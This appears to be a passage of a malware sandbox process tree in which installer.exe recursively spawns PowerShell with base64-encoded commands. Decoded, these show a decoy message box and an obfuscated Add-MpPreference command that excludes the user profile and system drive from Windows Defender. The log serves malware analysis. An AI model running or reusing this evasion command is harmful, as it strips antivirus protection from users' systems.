        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        37⤵
        System Location Discovery: System Language Discovery
        
        PID:4360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        37⤵
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        37⤵
        
        PID:4512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        38⤵
        
        PID:4768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        38⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        38⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        39⤵
        
        PID:2672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        39⤵
        System Location Discovery: System Language Discovery
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        39⤵
        
        PID:2252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        40⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        40⤵
        
        PID:1580
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        40⤵
        
        PID:5100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        41⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        41⤵
        
        PID:2940
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        41⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        42⤵
        System Location Discovery: System Language Discovery
        
        PID:3864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        42⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        42⤵
        
        PID:3052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        43⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        43⤵
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        43⤵
        
        PID:4588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        44⤵
        
        PID:3136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        44⤵
        
        PID:5100
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        44⤵
        
        PID:2916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        45⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        45⤵
        
        PID:3432
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        45⤵
        
        PID:1684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        46⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        46⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        46⤵
        
        PID:1912
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        47⤵
        System Location Discovery: System Language Discovery
        
        PID:1684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        47⤵
        
        PID:5128
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        47⤵
        
        PID:5184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        48⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        48⤵
        
        PID:5280
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        48⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        49⤵
        
        PID:5368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        49⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        49⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        50⤵
        
        PID:5572
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        50⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        50⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        51⤵
        
        PID:5752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        51⤵
        
        PID:5784
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        51⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        52⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
